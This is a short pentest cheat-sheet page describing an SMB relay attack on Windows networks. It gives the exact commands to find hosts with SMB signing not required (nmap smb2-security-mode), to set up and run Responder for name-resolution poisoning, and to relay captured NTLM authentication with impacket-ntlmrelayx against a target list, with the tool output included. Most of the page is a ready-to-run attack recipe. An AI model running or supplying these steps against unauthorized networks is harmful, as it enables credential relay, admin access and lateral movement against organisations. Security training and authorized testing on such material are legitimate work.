SMB Relay
SMB Relay through Impacket Responder and NTLMNrelayx
Prerequisites
SMB Signing
SMB Signing is enabled but not required (disabled) on Windows workstations and enabled and required on Windows Servers by default.
Nmap - SMB Security Mode Discovery
There are two nmap scripts for SMB message signing mode detection, one for SMBv1 and for SMBv2 we are going to use.
nmap --script smb2-security-mode
nmap --script smb2-security-mode.nse -p 445 127.0.0.1
...
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 12:34:56:78:9A:BC (Unknown)
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
Copy all targets (IPs/hostnames) into targets.txt.
Admin Account
A user has to be admin on the relayed machine (You can't do SMB relay without an admin account).
Responder
Modify Responder.conf
# locate Responder.conf
/usr/share/responder/Responder.conf
Disable these options
SMB = Off
HTTP = Off
Start Responder
responder -I eth0 -rdw -v
NTLMN RelayX
The Relay server starts SMB and HTTP server (that's why they are disabled in the responder).
#locate ntlmrelayx
impacket-ntlmrelayx -tf ./targets.txt -smb2support
..
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
User Interaction
Now a user needs to address SMB folder
Last updated
Was this helpful?